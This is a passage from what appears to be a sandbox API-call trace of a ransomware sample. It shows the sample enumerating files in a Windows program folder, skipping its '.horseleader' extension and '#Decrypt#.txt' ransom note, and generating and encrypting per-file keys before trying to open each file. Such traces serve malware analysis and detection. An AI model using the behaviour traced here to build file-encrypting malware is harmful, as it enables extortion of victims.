lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.897] CloseHandle (hObject=0x158) returned 1 [0251.897] 
GetProcessHeap () returned 0x780000 [0251.897] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.897] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa108fe2a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa8b92dd, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa11287e6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Travel", cAlternateFileName="")) returned 1 [0251.897] lstrcmpiW (lpString1="Travel", lpString2="Windows") returned -1 [0251.897] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 54 [0251.897] lstrcmpW (lpString1="Travel", lpString2=".") returned 1 [0251.897] lstrcmpW (lpString1="Travel", lpString2="..") returned 1 [0251.897] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.897] GetProcessHeap () returned 0x780000 [0251.898] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.898] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\*") returned 56 [0251.898] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa108fe2a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa8b92dd, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa11287e6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.901] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.901] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\.") returned 56 [0251.901] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.901] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa108fe2a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa8b92dd, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa11287e6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.901] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.901] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\..") returned 57 [0251.902] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.902] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.902] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726438ff, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726438ff, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x701d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-background.png", cAlternateFileName="")) returned 1 [0251.902] lstrcmpiW (lpString1="16_9-frame-background.png", lpString2="Windows") returned -1 [0251.902] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png") returned 80 [0251.902] StrStrIW (lpFirst="16_9-frame-background.png", lpSrch=".horseleader") returned 0x0 [0251.902] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.902] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="_uninstalling_.png") returned 1 [0251.902] lstrlenW (lpString=".testttjffg") returned 11 [0251.902] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png", lpSrch=".testttjffg") returned 0x0 [0251.902] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.902] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.902] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.903] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726438ff, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726438ff, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x609, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-highlight.png", cAlternateFileName="")) returned 1 [0251.904] lstrcmpiW (lpString1="16_9-frame-highlight.png", lpString2="Windows") returned -1 [0251.904] 
wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png") returned 79 [0251.904] StrStrIW (lpFirst="16_9-frame-highlight.png", lpSrch=".horseleader") returned 0x0 [0251.904] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.904] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.904] lstrlenW (lpString=".testttjffg") returned 11 [0251.904] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.904] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.904] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.904] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.905] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72669a5c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72669a5c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553c313d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc57, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-image-inset.png", cAlternateFileName="")) returned 1 [0251.905] lstrcmpiW (lpString1="16_9-frame-image-inset.png", 
lpString2="Windows") returned -1 [0251.905] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png") returned 81 [0251.905] StrStrIW (lpFirst="16_9-frame-image-inset.png", lpSrch=".horseleader") returned 0x0 [0251.905] lstrcmpW (lpString1="16_9-frame-image-inset.png", lpString2="#Decrypt#.txt") returned 1 [0251.905] lstrcmpW (lpString1="16_9-frame-image-inset.png", lpString2="_uninstalling_.png") returned 1 [0251.905] lstrlenW (lpString=".testttjffg") returned 11 [0251.905] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png", lpSrch=".testttjffg") returned 0x0 [0251.905] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.906] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.906] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-image-inset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.906] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7268fbb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7268fbb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x213d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-back-static.png", cAlternateFileName="")) returned 1 
[0251.906] lstrcmpiW (lpString1="btn-back-static.png", lpString2="Windows") returned -1 [0251.906] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png") returned 74 [0251.906] StrStrIW (lpFirst="btn-back-static.png", lpSrch=".horseleader") returned 0x0 [0251.906] lstrcmpW (lpString1="btn-back-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.906] lstrcmpW (lpString1="btn-back-static.png", lpString2="_uninstalling_.png") returned 1 [0251.906] lstrlenW (lpString=".testttjffg") returned 11 [0251.906] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png", lpSrch=".testttjffg") returned 0x0 [0251.906] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.906] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.907] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.907] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7268fbb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7268fbb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1fb8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-next-static.png", cAlternateFileName="")) returned 1 
[0251.907] lstrcmpiW (lpString1="btn-next-static.png", lpString2="Windows") returned -1 [0251.907] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png") returned 74 [0251.907] StrStrIW (lpFirst="btn-next-static.png", lpSrch=".horseleader") returned 0x0 [0251.907] lstrcmpW (lpString1="btn-next-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.907] lstrcmpW (lpString1="btn-next-static.png", lpString2="_uninstalling_.png") returned 1 [0251.907] lstrlenW (lpString=".testttjffg") returned 11 [0251.907] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png", lpSrch=".testttjffg") returned 0x0 [0251.908] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.908] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.908] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-next-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.909] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7268fbb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7268fbb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x20d6, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-previous-static.png", cAlternateFileName="")) returned 1 
[0251.909] lstrcmpiW (lpString1="btn-previous-static.png", lpString2="Windows") returned -1 [0251.909] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png") returned 78 [0251.909] StrStrIW (lpFirst="btn-previous-static.png", lpSrch=".horseleader") returned 0x0 [0251.909] lstrcmpW (lpString1="btn-previous-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.909] lstrcmpW (lpString1="btn-previous-static.png", lpString2="_uninstalling_.png") returned 1 [0251.909] lstrlenW (lpString=".testttjffg") returned 11 [0251.909] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png", lpSrch=".testttjffg") returned 0x0 [0251.909] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.909] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.909] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-previous-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.910] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726b5d16, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726b5d16, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3c2, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="button-bullet.png", 
cAlternateFileName="")) returned 1 [0251.910] lstrcmpiW (lpString1="button-bullet.png", lpString2="Windows") returned -1 [0251.910] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png") returned 72 [0251.910] StrStrIW (lpFirst="button-bullet.png", lpSrch=".horseleader") returned 0x0 [0251.910] lstrcmpW (lpString1="button-bullet.png", lpString2="#Decrypt#.txt") returned 1 [0251.910] lstrcmpW (lpString1="button-bullet.png", lpString2="_uninstalling_.png") returned 1 [0251.910] lstrlenW (lpString=".testttjffg") returned 11 [0251.910] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png", lpSrch=".testttjffg") returned 0x0 [0251.910] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.910] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.910] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\button-bullet.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.911] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726b5d16, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726b5d16, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="button-highlight.png", 
cAlternateFileName="")) returned 1 [0251.911] lstrcmpiW (lpString1="button-highlight.png", lpString2="Windows") returned -1 [0251.911] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png") returned 75 [0251.911] StrStrIW (lpFirst="button-highlight.png", lpSrch=".horseleader") returned 0x0 [0251.911] lstrcmpW (lpString1="button-highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.911] lstrcmpW (lpString1="button-highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.911] lstrlenW (lpString=".testttjffg") returned 11 [0251.911] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.911] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.911] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.912] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\button-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.912] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726dbe73, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726dbe73, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5540f3f9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x47c1d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, 
cFileName="content-background.png", cAlternateFileName="")) returned 1 [0251.912] lstrcmpiW (lpString1="content-background.png", lpString2="Windows") returned -1 [0251.912] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png") returned 77 [0251.912] StrStrIW (lpFirst="content-background.png", lpSrch=".horseleader") returned 0x0 [0251.912] lstrcmpW (lpString1="content-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.912] lstrcmpW (lpString1="content-background.png", lpString2="_uninstalling_.png") returned 1 [0251.912] lstrlenW (lpString=".testttjffg") returned 11 [0251.912] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png", lpSrch=".testttjffg") returned 0x0 [0251.912] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.912] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.912] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\content-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.915] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72701fd0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72701fd0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5540f3f9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11276, dwReserved0=0x7e1110, 
dwReserved1=0xfbc691b5, cFileName="header-background.png", cAlternateFileName="")) returned 1 [0251.915] lstrcmpiW (lpString1="header-background.png", lpString2="Windows") returned -1 [0251.915] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png") returned 76 [0251.915] StrStrIW (lpFirst="header-background.png", lpSrch=".horseleader") returned 0x0 [0251.916] lstrcmpW (lpString1="header-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.916] lstrcmpW (lpString1="header-background.png", lpString2="_uninstalling_.png") returned 1 [0251.916] lstrlenW (lpString=".testttjffg") returned 11 [0251.916] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png", lpSrch=".testttjffg") returned 0x0 [0251.916] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.916] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.916] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\header-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.916] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72701fd0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72701fd0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3126b, 
dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="passport.png", cAlternateFileName="")) returned 1 [0251.916] lstrcmpiW (lpString1="passport.png", lpString2="Windows") returned -1 [0251.917] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png") returned 67 [0251.917] StrStrIW (lpFirst="passport.png", lpSrch=".horseleader") returned 0x0 [0251.917] lstrcmpW (lpString1="passport.png", lpString2="#Decrypt#.txt") returned 1 [0251.917] lstrcmpW (lpString1="passport.png", lpString2="_uninstalling_.png") returned 1 [0251.917] lstrlenW (lpString=".testttjffg") returned 11 [0251.917] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png", lpSrch=".testttjffg") returned 0x0 [0251.917] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.917] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.917] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff 